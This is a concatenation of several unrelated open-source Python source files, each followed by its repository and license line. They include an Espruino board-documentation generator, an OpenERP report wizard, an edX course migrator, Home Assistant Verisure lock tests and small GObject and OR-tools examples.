#if not embeddable and "link" in board.info and board.info["link"][0].startswith("http://www.espruino.com"):
# writeHTML('<html><head><meta http-equiv="refresh" content="0; url="'+board.info["link"][0]+'"></head><body>Please wait. redirecting...</body></html>');
# exit(0);
# -----------------------------------------------------------------------------------------
functionsOnBoard = [];
for pin in pins:
if pin["name"][0] == 'P':
pin["name"] = pin["name"][1:];
for func in pin["functions"]:
if func in pinutils.CLASSES:
if not pinutils.CLASSES[func] in functionsOnBoard:
functionsOnBoard.append(pinutils.CLASSES[func])
pinmap = {};
if '_pinmap' in board.board:
pinmap = board.board['_pinmap'];
# -----------------------------------------------------------------------------------------
def dump_pin(pin, pinstrip):
if pin in pinmap:
pin = pinmap[pin];
pininfo = pinutils.findpin(pins, pin, False)
not_five_volt = False
# print(json.dumps(pininfo))
if ("csv" in pininfo) and ("IO" in pininfo["csv"]) and ("Type" in pininfo["csv"]) and (pininfo["csv"]["Type"]=="I/O") and (pininfo["csv"]["IO"]!="FT") :
not_five_volt = True
writeHTML(' <DIV class="'+pinstrip+'pin pin">');
pinHTML = ' <SPAN class="pinname">'+pin+"</SPAN>";
pinHTML2 = '';
if not_five_volt:
pinHTML2 += '<SPAN class="pinfunction NOT_5V" title="Not 5v Tolerant">3.3v</SPAN>\n';
if ("_notes" in board.board) and (pin in board.board["_notes"]):
pinHTML2 += '<SPAN class="pinfunction NOTE" title="'+board.board["_notes"][pin]+'">!</SPAN>\n';
reverse = pinstrip=="left" or pinstrip=="right2";
if not reverse: writeHTML(pinHTML+"\n"+pinHTML2)
pinfuncs = {}
for func in sorted(pininfo["functions"]):
# writeHTML(' '+func)
if func in pinutils.CLASSES:
funcdata = str(pininfo["functions"][func])
cls = pinutils.CLASSES[func]
name = cls
title = func
if cls=="I2C" or cls=="SPI" or cls=="USART": name=func.replace("_"," ")
if cls=="DEVICE" and funcdata[:4]=="pin_":
title = title + " ("+funcdata[4:]+")";
# print title
if func in pinutils.NAMES: name = pinutils.NAMES[func]
writeHTML('<!-- '+func+' -->')
if name in pinfuncs:
pinfuncs[name]["title"] = pinfuncs[name]["title"] + " " + title
else:
pinfuncs[name] = { 'cls': cls, 'title': "["+pin+"] "+title, 'name': name, 'id': pin+"_"+func, 'func' : func };
for func in sorted(pinfuncs.items(),key=lambda x: x[1]['cls']):
pf = func[1]
url = False
if pf["cls"] in pinutils.URLS: url = pinutils.URLS[pf["cls"]]
if pf["func"] in pinutils.URLS: url = pinutils.URLS[pf["func"]]
if url != False: writeHTML(' <A href="'+url+'" class="pinfunctionlink">');
writeHTML(' <SPAN class="pinfunction '+pf["cls"]+'" title="'+pf["title"]+'" onMouseOver="showTT(\''+pf["id"]+'\')" onMouseOut="hideTT(\''+pf["id"]+'\')">'+pf["name"]+'</SPAN>')
if url != False: writeHTML(' </A>');
writeHTML(' <SPAN class="pintooltip" id="'+pf["id"]+'" style="display:none;">'+pf["title"]+'</SPAN>')
if reverse: writeHTML(pinHTML2+"\n"+pinHTML)
writeHTML(' </DIV>')
if not embeddable:
writeHTML("""<HTML>
<HEAD>
""");
writeHTML(""" <STYLE>
#boardcontainer { position: relative; }
#board {
position: absolute;
background-size: 100% auto; # width and height, can be %, px or whatever.
}
.pin { padding: 1px; height: 20px; }
.pinname {
background-color: #FFF;
border:1px solid black;
padding-left: 2px;
padding-right: 2px;
font-weight: bold;
}
.pinfunction {
border:1px solid black;
border-radius:3px;
padding-left: 2px;
padding-right: 2px;
}
.pinfunctionlink {
color : black;
text-decoration: none;
}
.pintooltip {
background-color: #FFD;
border:1px solid black;
padding-left: 2px;
padding-right: 2px;
font-weight: bold;
position: absolute;
z-index: 100;
}
.SPI { background-color: #8F8; }
.ADC { background-color: #88F; }
.DAC { background-color: #0CC; }
.PWM { background-color: #8FF; }
.USART { background-color: #FF8; }
.CAN { background-color: #8CC; }
.I2C { background-color: #F88; }
.DEVICE { background-color: #F8F; }
.NOT_5V { background-color: #FDD; }
.NOTE { background-color: #F80; }
#top { white-space: nowrap; }
#top2 { white-space: nowrap; }
#bottom { white-space: nowrap; }
#bottom2 { white-space: nowrap; }
#left { text-align:right; }
#right2 { text-align:right; }
.toppin {
-webkit-transform: rotate(-90deg);
-moz-transform: rotate(-90deg);
-ms-transform: rotate(-90deg);
-o-transform: rotate(-90deg);
transform: rotate(-90deg);
display: inline-block;
width: 20px;
}
.top2pin {
-webkit-transform: rotate(90deg);
-moz-transform: rotate(90deg);
-ms-transform: rotate(90deg);
-o-transform: rotate(90deg);
transform: rotate(90deg);
display: inline-block;
width: 20px;
}
.bottompin {
-webkit-transform: rotate(90deg);
-moz-transform: rotate(90deg);
-ms-transform: rotate(90deg);
-o-transform: rotate(90deg);
transform: rotate(90deg);
display: inline-block;
width: 20px;
}
.bottom2pin {
-webkit-transform: rotate(-90deg);
-moz-transform: rotate(-90deg);
-ms-transform: rotate(-90deg);
-o-transform: rotate(-90deg);
transform: rotate(-90deg);
display: inline-block;
width: 20px;
}
.line {
height:2px;background-color:red;position:absolute;
}
.line:hover {
background-color:#FF00FF;
}
""");
for pinstrip in board.board:
if pinstrip[0]!='_':
writeHTML(" #"+pinstrip+" { position: absolute; }")
writeHTML(" ."+pinstrip+"pin { white-space: nowrap; }")
writeHTML(board.board_css)
writeHTML(" </STYLE>"+'<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>')
writeHTML("""
<SCRIPT type="text/javascript">
function showTT(ttid) {
var e = document.getElementById(ttid);
e.style.display = 'block';
}
function hideTT(ttid) {
var e = document.getElementById(ttid);
e.style.display = 'none';
}
function drawLine(x1, y1, x2, y2, hover) {
if (x2 < x1) {
var temp = x1;
x1 = x2;
x2 = temp;
temp = y1;
y1 = y2;
y2 = temp;
}
var line = $('<div class="line" alt="'+hover+'"></div>').appendTo($("body"));
var length = Math.sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2));
line.css('width', length + "px");
var angle = Math.atan((y2 - y1) / (x2 - x1));
line.css('top', y1 + 0.5 * length * Math.sin(angle) + "px");
line.css('left', x1 - 0.5 * length * (1 - Math.cos(angle)) + "px");
line.css('-moz-transform', "rotate(" + angle + "rad)");
line.css('-webkit-transform', "rotate(" + angle + "rad)");
line.css('-o-transform', "rotate(" + angle + "rad)");
}
</SCRIPT>
""")
if not embeddable:
writeHTML(" </HEAD>")
writeHTML(" <BODY>")
writeHTML(' <H1>'+board.info["name"]+'</H1>')
writeHTML(' <!-- '+boardname+' -->')
if "link" in board.info:
for link in board.info["link"]:
writeHTML(' <P><a href=\"'+link+'\"" target="_blank">'+link+'</a></P>')
writeHTML(' <H2>Specifications</H2>')
writeHTML(' <TABLE style="margin-left:100px;">')
writeHTML(' <TR><TH width="256">Chip</TH><TD>'+board.chip['part']+'</TD></TR>')
writeHTML(' <TR><TH>Package</TH><TD>'+board.chip['package']+'</TD></TR>')
writeHTML(' <TR><TH>RAM</TH><TD>'+str(board.chip['ram'])+' kBytes</TD></TR>')
writeHTML(' <TR><TH>Flash</TH><TD>'+str(board.chip['flash'])+' kBytes</TD></TR>')
writeHTML(' <TR><TH>Speed</TH><TD>'+str(board.chip['speed'])+' Mhz</TD></TR>')
writeHTML(' <TR><TH>USARTs</TH><TD>'+str(board.chip['usart'])+'</TD></TR>')
writeHTML(' <TR><TH>SPIs</TH><TD>'+str(board.chip['spi'])+'</TD></TR>')
writeHTML(' <TR><TH>I2Cs</TH><TD>'+str(board.chip['i2c'])+'</TD></TR>')
writeHTML(' <TR><TH>USB</TH><TD>'+("Yes" if "USB" in board.devices else "No")+'</TD></TR>')
writeHTML(' <TR><TH>DACs</TH><TD>'+(str(board.chip['dac']) if board.chip['dac']>0 else "No")+'</TD></TR>')
writeHTML(' <TR><TH>SD Card</TH><TD>'+("Yes" if "SD" in board.devices else "No")+'</TD></TR>')
writeHTML(' </TABLE>')
writeHTML(' <P>Like this? Please tell your friends, blog, or <a href="http://www.espruino.com/Order">support us by buying our board</a>!</P>')
writeHTML(' <H2>Pinout</H2>')
writeHTML("""
<P>Hover the mouse over a pin function for more information. Clicking in a function will tell you how to use it in Espruino.</P>
<ul>
<li><span class="pinfunction DEVICE">Purple</span> boxes show pins that are used for other functionality on the board. You should avoid using these unless you know that the marked device is not used.</li>
<li><span class="pinfunction NOTE">!</span> boxes contain extra information about the pin. Hover your mouse over them to see it.</li>
<li><span class="pinfunction NOT_5V">3.3v</span> boxes mark pins that are not 5v tolerant (they only take inputs from 0 - 3.3v, not 0 - 5v).</li>
<li><span class="pinfunction">3.3</span> is a 3.3v output from the on-board Voltage regulator.</li>
<li><span class="pinfunction">GND</span> is ground (0v).</li>
<li><span class="pinfunction">VBAT</span> is the battery voltage output (see <a href="/EspruinoBoard">the Espruino Board Reference</a>).</li>
<li><span class="pinfunction ADC">ADC</span> is an <a href="/ADC">Analog to Digital Converter</a> (for reading analog voltages)</li>""");
if "DAC" in functionsOnBoard: writeHTML(""" <li><span class="pinfunction DAC">DAC</span> is a <a href="/DAC">Digital to Analog Converter</a> (for creating analog voltages). This is not available on all boards.</li>""")
writeHTML(""" <li><span class="pinfunction PWM">PWM</span> is for <a href="/PWM">Pulse Width Modulation</a>. This creates analog voltages from a digital output by sending a series of pulses.</li>
<li><span class="pinfunction SPI">SPI</span> is the 3 wire <a href="/SPI">Serial Peripheral Interface</a>.</li>
<li><span class="pinfunction USART">USART</span> is a 2 wire peripheral for <a href="/USART">Serial Data</a>.</li>
<li><span class="pinfunction I2C">I2C</span> is the 2 wire <a href="/I2C">Inter-Integrated Circuit</a> bus.</li>
""");
if "CAN" in functionsOnBoard: writeHTML(""" <li><span class="pinfunction CAN">CAN</span> is for the <a href="http://en.wikipedia.org/wiki/CAN_bus">Controller Area Network</a>. It is not supported by Espruino.</li>""")
writeHTML(" </ul>");
writeHTML(' <DIV id="boardcontainer">')
writeHTML(' <DIV id="board">')
usedpins = []
for pinstrip in board.board:
if pinstrip[0]!='_':
writeHTML(' <DIV id="'+pinstrip+'">')
for pin in board.board[pinstrip]:
usedpins.append(pin)
dump_pin(pin, pinstrip)
writeHTML(' </DIV>')
otherpins=0
for pinstruct in pins:
pin = pinstruct["name"]
if not pin in usedpins:
otherpins = otherpins + 1
writeHTML(' </DIV id="board">')
writeHTML(' </DIV id="boardcontainer">')
if otherpins>0:
writeHTML(' <DIV id="otherpins">')
writeHTML(' <H2>Pins not on connectors</H2>')
for pinstruct in pins:
pin = pinstruct["name"]
if not pin in usedpins:
dump_pin(pin, "otherpins")
writeHTML(' </DIV>')
writeHTML(' <P></P>')
#writeHTML('<SCRIPT type="text/javascript"> $(function() {');
#writeHTML('var x = $("#board").offset().left+500;');
#writeHTML('var y = $("#board").offset().top+200;');
#d = 12
#writeHTML('drawLine(x+'+str(-5*d)+',y+'+str(-5*d)+',x+'+str(5*d)+',y+'+str(-5*d)+');');
#writeHTML('drawLine(x+'+str(5*d)+',y+'+str(-5*d)+',x+'+str(5*d)+',y+'+str(5*d)+');');
#writeHTML('drawLine(x+'+str(5*d)+',y+'+str(5*d)+',x+'+str(-5*d)+',y+'+str(5*d)+');');
#writeHTML('drawLine(x+'+str(-5*d)+',y+'+str(5*d)+',x+'+str(-5*d)+',y+'+str(-5*d)+');');
#writeHTML('var p;');
#for pinstrip in board.board:
# if pinstrip[0]!='_':
# for pin in board.board[pinstrip]:
# if pin in pinmap:
# pin = pinmap[pin];
# pininfo = pinutils.findpin(pins, pin, False)
# if "UQFN48" in pininfo["csv"]:
# n = int(pininfo["csv"]["UQFN48"])-1
# n = (n+12) % 48
# if n<12:
# px = (n-6)*d
# py = -6*d
# elif n<24:
# px = 6*d
# py = ((n-12)-6)*d
# elif n<36:
# px = (6-(n-24))*d
# py = 6*d
# else:
# px = -6*d
# py = (6-(n-36))*d
#
# writeHTML("p=$('.pinname:contains(\""+pin+".\")');");
# pinx = "p.offset().left+p.width()/2";
# piny = "p.offset().top+p.height()/2";
# writeHTML('drawLine(x+'+str(px)+',y+'+str(py)+','+pinx+','+piny+', "'+pin+'");');
#writeHTML('});</SCRIPT>');
if not embeddable:
writeHTML(" </BODY>")
writeHTML("</HTML>")
| koltegirish/Espruino | scripts/build_board_docs.py | Python | mpl-2.0 | 14,959 |
##############################################################################
#
# Copyright (c) 2008-2011 Alistek Ltd (http://www.alistek.com) All Rights Reserved.
# General contacts <[email protected]>
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# This module is GPLv3 or newer and incompatible
# with OpenERP SA "AGPL + Private Use License"!
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
import wizard
import pooler
from tools.translate import _
def ir_del(cr, uid, id):
obj = pooler.get_pool(cr.dbname).get('ir.values')
return obj.unlink(cr, uid, [id])
class report_actions_remove_wizard(wizard.interface):
'''
Remove print button
'''
form = '''<?xml version="1.0"?>
<form string="Remove print button">
<label string="Or you want to remove print button for this report?"/>
</form>'''
ex_form = '''<?xml version="1.0"?>
<form string="Remove print button">
<label string="No Report Action to delete for this report"/>
</form>'''
done_form = '''<?xml version="1.0"?>
<form string="Remove print button">
<label string="The print button is successfully removed"/>
</form>'''
def _do_action(self, cr, uid, data, context):
pool = pooler.get_pool(cr.dbname)
report = pool.get(data['model']).read(cr, uid, data['id'], ['report_wizard'], context=context)
if report['report_wizard']:
pool.get('ir.actions.act_window').unlink(cr, uid, data['report_action_id'], context=context)
else:
event_id = pool.get('ir.values').search(cr, uid, [('value','=','ir.actions.report.xml,%d' % data['id'])])[0]
res = ir_del(cr, uid, event_id)
return {}
def _check(self, cr, uid, data, context):
pool = pooler.get_pool(cr.dbname)
report = pool.get(data['model']).browse(cr, uid, data['id'], context=context)
if report.report_wizard:
act_win_obj = pool.get('ir.actions.act_window')
act_win_ids = act_win_obj.search(cr, uid, [('res_model','=','aeroo.print_actions')], context=context)
for act_win in act_win_obj.browse(cr, uid, act_win_ids, context=context):
act_win_context = eval(act_win.context, {})
if act_win_context.get('report_action_id')==report.id:
data['report_action_id'] = act_win.id
return 'remove'
return 'no_exist'
else:
ids = pool.get('ir.values').search(cr, uid, [('value','=',report.type+','+str(data['id']))])
if not ids:
return 'no_exist'
else:
return 'remove'
states = {
'init': {
'actions': [],
'result': {'type':'choice','next_state':_check}
},
'remove': {
'actions': [],
'result': {'type': 'form', 'arch': form, 'fields': {}, 'state': (('end', _('_No')), ('process', _('_Yes')))},
},
'no_exist': {
'actions': [],
'result': {'type': 'form', 'arch': ex_form, 'fields': {}, 'state': (('end', _('_Close')),)},
},
'process': {
'actions': [_do_action],
'result': {'type': 'state', 'state': 'done'},
},
'done': {
'actions': [],
'result': {'type': 'form', 'arch': done_form, 'fields': {}, 'state': (('exit', _('_Close')),)},
},
'exit': {
'actions': [],
'result': {'type': 'state', 'state': 'end'},
},
}
report_actions_remove_wizard('aeroo.report_actions_remove')
| kailIII/emaresa | trunk.pe/report_aeroo/wizard/report_actions_remove.py | Python | agpl-3.0 | 4,658 |
'''
Code for migrating from other modulestores to the split_mongo modulestore.
Exists at the top level of modulestore b/c it needs to know about and access each modulestore.
In general, it's strategy is to treat the other modulestores as read-only and to never directly
manipulate storage but use existing api's.
'''
import logging
from opaque_keys.edx.locator import CourseLocator
from xblock.fields import Reference, ReferenceList, ReferenceValueDict
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.exceptions import ItemNotFoundError
log = logging.getLogger(__name__)
class SplitMigrator:
"""
Copies courses from old mongo to split mongo and sets up location mapping so any references to the old
name will be able to find the new elements.
"""
def __init__(self, split_modulestore, source_modulestore):
super().__init__()
self.split_modulestore = split_modulestore
self.source_modulestore = source_modulestore
def migrate_mongo_course(
self, source_course_key, user_id, new_org=None, new_course=None, new_run=None, fields=None, **kwargs
):
"""
Create a new course in split_mongo representing the published and draft versions of the course from the
original mongo store. And return the new CourseLocator
If the new course already exists, this raises DuplicateItemError
:param source_course_key: which course to migrate
:param user_id: the user whose action is causing this migration
:param new_org, new_course, new_run: (optional) identifiers for the new course. Defaults to
the source_course_key's values.
"""
# the only difference in data between the old and split_mongo xblocks are the locations;
# so, any field which holds a location must change to a Locator; otherwise, the persistence
# layer and kvs's know how to store it.
# locations are in location, children, conditionals, course.tab
# create the course: set fields to explicitly_set for each scope, id_root = new_course_locator, master_branch = 'production' # lint-amnesty, pylint: disable=line-too-long
original_course = self.source_modulestore.get_course(source_course_key, **kwargs)
if original_course is None:
raise ItemNotFoundError(str(source_course_key))
if new_org is None:
new_org = source_course_key.org
if new_course is None:
new_course = source_course_key.course
if new_run is None:
new_run = source_course_key.run
new_course_key = CourseLocator(new_org, new_course, new_run, branch=ModuleStoreEnum.BranchName.published)
with self.split_modulestore.bulk_operations(new_course_key):
new_fields = self._get_fields_translate_references(original_course, new_course_key, None)
if fields:
new_fields.update(fields)
new_course = self.split_modulestore.create_course(
new_org, new_course, new_run, user_id,
fields=new_fields,
master_branch=ModuleStoreEnum.BranchName.published,
skip_auto_publish=True,
**kwargs
)
self._copy_published_modules_to_course(
new_course, original_course.location, source_course_key, user_id, **kwargs
)
# TODO: This should be merged back into the above transaction, but can't be until split.py
# is refactored to have more coherent access patterns
with self.split_modulestore.bulk_operations(new_course_key):
# create a new version for the drafts
self._add_draft_modules_to_course(new_course.location, source_course_key, user_id, **kwargs)
return new_course.id
def _copy_published_modules_to_course(self, new_course, old_course_loc, source_course_key, user_id, **kwargs):
"""
Copy all of the modules from the 'direct' version of the course to the new split course.
"""
course_version_locator = new_course.id.version_agnostic()
# iterate over published course elements. Wildcarding rather than descending b/c some elements are orphaned (e.g., # lint-amnesty, pylint: disable=line-too-long
# course about pages, conditionals)
for module in self.source_modulestore.get_items(
source_course_key, revision=ModuleStoreEnum.RevisionOption.published_only, **kwargs
):
# don't copy the course again.
if module.location != old_course_loc:
# create split_xblock using split.create_item
# NOTE: the below auto populates the children when it migrates the parent; so,
# it doesn't need the parent as the first arg. That is, it translates and populates
# the 'children' field as it goes.
_new_module = self.split_modulestore.create_item(
user_id,
course_version_locator,
module.location.block_type,
block_id=module.location.block_id,
fields=self._get_fields_translate_references(
module, course_version_locator, new_course.location.block_id
),
skip_auto_publish=True,
**kwargs
)
# after done w/ published items, add version for DRAFT pointing to the published structure
index_info = self.split_modulestore.get_course_index_info(course_version_locator)
versions = index_info['versions']
versions[ModuleStoreEnum.BranchName.draft] = versions[ModuleStoreEnum.BranchName.published]
self.split_modulestore.update_course_index(course_version_locator, index_info)
# clean up orphans in published version: in old mongo, parents pointed to the union of their published and draft
# children which meant some pointers were to non-existent locations in 'direct'
self.split_modulestore.fix_not_found(course_version_locator, user_id)
def _add_draft_modules_to_course(self, published_course_usage_key, source_course_key, user_id, **kwargs):
"""
update each draft. Create any which don't exist in published and attach to their parents.
"""
# each true update below will trigger a new version of the structure. We may want to just have one new version
# but that's for a later date.
new_draft_course_loc = published_course_usage_key.course_key.for_branch(ModuleStoreEnum.BranchName.draft)
# to prevent race conditions of grandchilden being added before their parents and thus having no parent to
# add to
awaiting_adoption = {}
for module in self.source_modulestore.get_items(
source_course_key, revision=ModuleStoreEnum.RevisionOption.draft_only, **kwargs
):
new_locator = new_draft_course_loc.make_usage_key(module.category, module.location.block_id)
if self.split_modulestore.has_item(new_locator):
# was in 'direct' so draft is a new version
split_module = self.split_modulestore.get_item(new_locator, **kwargs)
# need to remove any no-longer-explicitly-set values and add/update any now set values.
for name, field in split_module.fields.items():
if field.is_set_on(split_module) and not module.fields[name].is_set_on(module):
field.delete_from(split_module)
for field, value in self._get_fields_translate_references(
module, new_draft_course_loc, published_course_usage_key.block_id, field_names=False
).items():
field.write_to(split_module, value)
_new_module = self.split_modulestore.update_item(split_module, user_id, **kwargs)
else:
# only a draft version (aka, 'private').
_new_module = self.split_modulestore.create_item(
user_id, new_draft_course_loc,
new_locator.block_type,
block_id=new_locator.block_id,
fields=self._get_fields_translate_references(
module, new_draft_course_loc, published_course_usage_key.block_id
),
**kwargs
)
awaiting_adoption[module.location] = new_locator
for draft_location, new_locator in awaiting_adoption.items():
parent_loc = self.source_modulestore.get_parent_location(
draft_location, revision=ModuleStoreEnum.RevisionOption.draft_preferred, **kwargs
)
if parent_loc is None:
log.warning('No parent found in source course for %s', draft_location)
continue
old_parent = self.source_modulestore.get_item(parent_loc, **kwargs)
split_parent_loc = new_draft_course_loc.make_usage_key(
parent_loc.block_type,
parent_loc.block_id if parent_loc.block_type != 'course' else published_course_usage_key.block_id
)
new_parent = self.split_modulestore.get_item(split_parent_loc, **kwargs)
# this only occurs if the parent was also awaiting adoption: skip this one, go to next
if any(new_locator.block_id == child.block_id for child in new_parent.children):
continue
# find index for module: new_parent may be missing quite a few of old_parent's children
new_parent_cursor = 0
for old_child_loc in old_parent.children:
if old_child_loc.block_id == draft_location.block_id:
break # moved cursor enough, insert it here
# sibling may move cursor
for idx in range(new_parent_cursor, len(new_parent.children)):
if new_parent.children[idx].block_id == old_child_loc.block_id:
new_parent_cursor = idx + 1
break # skipped sibs enough, pick back up scan
new_parent.children.insert(new_parent_cursor, new_locator)
new_parent = self.split_modulestore.update_item(new_parent, user_id)
def _get_fields_translate_references(self, xblock, new_course_key, course_block_id, field_names=True):
"""
Return a dictionary of field: value pairs for explicitly set fields
but convert all references to their BlockUsageLocators
Args:
field_names: if Truthy, the dictionary keys are the field names. If falsey, the keys are the
field objects.
"""
def get_translation(location):
"""
Convert the location
"""
return new_course_key.make_usage_key(
location.block_type,
location.block_id if location.block_type != 'course' else course_block_id
)
result = {}
for field_name, field in xblock.fields.items():
if field.is_set_on(xblock):
field_value = field.read_from(xblock)
field_key = field_name if field_names else field
if isinstance(field, Reference) and field_value is not None:
result[field_key] = get_translation(field_value)
elif isinstance(field, ReferenceList):
result[field_key] = [
get_translation(ele) for ele in field_value
]
elif isinstance(field, ReferenceValueDict):
result[field_key] = {
key: get_translation(subvalue)
for key, subvalue in field_value.items()
}
else:
result[field_key] = field_value
return result
| eduNEXT/edx-platform | common/lib/xmodule/xmodule/modulestore/split_migrator.py | Python | agpl-3.0 | 11,976 |
import hashlib
def make_hashkey(seed):
'''
Generate a hashkey (string)
'''
h = hashlib.md5()
h.update(str(seed))
return h.hexdigest()
def get_request_ip(request):
'''
Retrieve the IP origin of a Django request
'''
ip = request.META.get('HTTP_X_REAL_IP','') # nginx reverse proxy
if not ip:
ip = request.META.get('REMOTE_ADDR','None')
return ip
| GbalsaC/bitnamiP | xqueue/queue/util.py | Python | agpl-3.0 | 402 |
from __future__ import print_function
from gi.repository import GObject
class C(GObject.GObject):
@GObject.Signal(arg_types=(int,))
def my_signal(self, arg):
"""Decorator style signal which uses the method name as signal name and
the method as the closure.
Note that with python3 annotations can be used for argument types as follows:
@GObject.Signal
def my_signal(self, arg:int):
pass
"""
print("C: class closure for `my_signal' called with argument", arg)
@GObject.Signal
def noarg_signal(self):
"""Decoration of a signal using all defaults and no arguments."""
print("C: class closure for `noarg_signal' called")
class D(C):
def do_my_signal(self, arg):
print("D: class closure for `my_signal' called. Chaining up to C")
C.my_signal(self, arg)
def my_signal_handler(obj, arg, *extra):
print("handler for `my_signal' called with argument", arg, "and extra args", extra)
inst = C()
inst2 = D()
inst.connect("my_signal", my_signal_handler, 1, 2, 3)
inst.connect("noarg_signal", my_signal_handler, 1, 2, 3)
inst.emit("my_signal", 42)
inst.emit("noarg_signal")
inst2.emit("my_signal", 42)
| GNOME/pygobject | examples/signal.py | Python | lgpl-2.1 | 1,236 |
# Copyright 2011 Hakan Kjellerstrand [email protected]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Volsay problem in Google or-tools.
From the OPL model volsay.mod
Using arrays.
This model was created by Hakan Kjellerstrand ([email protected])
Also see my other Google CP Solver models:
http://www.hakank.org/google_or_tools/
"""
from __future__ import print_function
from ortools.linear_solver import pywraplp
def main(unused_argv):
# Create the solver.
# using GLPK
# solver = pywraplp.Solver('CoinsGridGLPK',
# pywraplp.Solver.GLPK_LINEAR_PROGRAMMING)
# Using CLP
solver = pywraplp.Solver('CoinsGridCLP',
pywraplp.Solver.CLP_LINEAR_PROGRAMMING)
# data
num_products = 2
Gas = 0
Chloride = 1
products = ['Gas', 'Chloride']
# declare variables
production = [solver.NumVar(0, 100000, 'production[%i]' % i)
for i in range(num_products)]
#
# constraints
#
solver.Add(production[Gas] + production[Chloride] <= 50)
solver.Add(3 * production[Gas] + 4 * production[Chloride] <= 180)
# objective
objective = solver.Maximize(40 * production[Gas] + 50 * production[Chloride])
print('NumConstraints:', solver.NumConstraints())
#
# solution and search
#
solver.Solve()
print()
print('objective = ', solver.Objective().Value())
for i in range(num_products):
print(products[i], '=', production[i].SolutionValue(), end=' ')
print('ReducedCost = ', production[i].ReducedCost())
if __name__ == '__main__':
main('Volsay')
| WendellDuncan/or-tools | examples/python/volsay2.py | Python | apache-2.0 | 2,080 |
"""Tests for the Verisure platform."""
from contextlib import contextmanager
from unittest.mock import call, patch
from homeassistant.components.lock import (
DOMAIN as LOCK_DOMAIN,
SERVICE_LOCK,
SERVICE_UNLOCK,
)
from homeassistant.components.verisure import DOMAIN as VERISURE_DOMAIN
from homeassistant.const import STATE_UNLOCKED
from homeassistant.setup import async_setup_component
NO_DEFAULT_LOCK_CODE_CONFIG = {
"verisure": {
"username": "test",
"password": "test",
"locks": True,
"alarm": False,
"door_window": False,
"hygrometers": False,
"mouse": False,
"smartplugs": False,
"thermometers": False,
"smartcam": False,
}
}
DEFAULT_LOCK_CODE_CONFIG = {
"verisure": {
"username": "test",
"password": "test",
"locks": True,
"default_lock_code": "9999",
"alarm": False,
"door_window": False,
"hygrometers": False,
"mouse": False,
"smartplugs": False,
"thermometers": False,
"smartcam": False,
}
}
LOCKS = ["door_lock"]
@contextmanager
def mock_hub(config, get_response=LOCKS[0]):
"""Extensively mock out a verisure hub."""
hub_prefix = "homeassistant.components.verisure.lock.hub"
# Since there is no conf to disable ethernet status, mock hub for
# binary sensor too
hub_binary_sensor = "homeassistant.components.verisure.binary_sensor.hub"
verisure_prefix = "verisure.Session"
with patch(verisure_prefix) as session, patch(hub_prefix) as hub:
session.login.return_value = True
hub.config = config["verisure"]
hub.get.return_value = LOCKS
hub.get_first.return_value = get_response.upper()
hub.session.set_lock_state.return_value = {
"doorLockStateChangeTransactionId": "test"
}
hub.session.get_lock_state_transaction.return_value = {"result": "OK"}
with patch(hub_binary_sensor, hub):
yield hub
async def setup_verisure_locks(hass, config):
"""Set up mock verisure locks."""
with mock_hub(config):
await async_setup_component(hass, VERISURE_DOMAIN, config)
await hass.async_block_till_done()
# lock.door_lock, ethernet_status
assert len(hass.states.async_all()) == 2
async def test_verisure_no_default_code(hass):
"""Test configs without a default lock code."""
await setup_verisure_locks(hass, NO_DEFAULT_LOCK_CODE_CONFIG)
with mock_hub(NO_DEFAULT_LOCK_CODE_CONFIG, STATE_UNLOCKED) as hub:
mock = hub.session.set_lock_state
await hass.services.async_call(
LOCK_DOMAIN, SERVICE_LOCK, {"entity_id": "lock.door_lock"}
)
await hass.async_block_till_done()
assert mock.call_count == 0
await hass.services.async_call(
LOCK_DOMAIN, SERVICE_LOCK, {"entity_id": "lock.door_lock", "code": "12345"}
)
await hass.async_block_till_done()
assert mock.call_args == call("12345", LOCKS[0], "lock")
mock.reset_mock()
await hass.services.async_call(
LOCK_DOMAIN, SERVICE_UNLOCK, {"entity_id": "lock.door_lock"}
)
await hass.async_block_till_done()
assert mock.call_count == 0
await hass.services.async_call(
LOCK_DOMAIN,
SERVICE_UNLOCK,
{"entity_id": "lock.door_lock", "code": "12345"},
)
await hass.async_block_till_done()
assert mock.call_args == call("12345", LOCKS[0], "unlock")
async def test_verisure_default_code(hass):
"""Test configs with a default lock code."""
await setup_verisure_locks(hass, DEFAULT_LOCK_CODE_CONFIG)
with mock_hub(DEFAULT_LOCK_CODE_CONFIG, STATE_UNLOCKED) as hub:
mock = hub.session.set_lock_state
await hass.services.async_call(
LOCK_DOMAIN, SERVICE_LOCK, {"entity_id": "lock.door_lock"}
)
await hass.async_block_till_done()
assert mock.call_args == call("9999", LOCKS[0], "lock")
await hass.services.async_call(
LOCK_DOMAIN, SERVICE_UNLOCK, {"entity_id": "lock.door_lock"}
)
await hass.async_block_till_done()
assert mock.call_args == call("9999", LOCKS[0], "unlock")
await hass.services.async_call(
LOCK_DOMAIN, SERVICE_LOCK, {"entity_id": "lock.door_lock", "code": "12345"}
)
await hass.async_block_till_done()
assert mock.call_args == call("12345", LOCKS[0], "lock")
await hass.services.async_call(
LOCK_DOMAIN,
SERVICE_UNLOCK,
{"entity_id": "lock.door_lock", "code": "12345"},
)
await hass.async_block_till_done()
assert mock.call_args == call("12345", LOCKS[0], "unlock")
| partofthething/home-assistant | tests/components/verisure/test_lock.py | Python | apache-2.0 | 4,819 |
# -*- coding: utf-8 -*-
###############################################################################
#
# FilterPlacesByTopLevelCategory
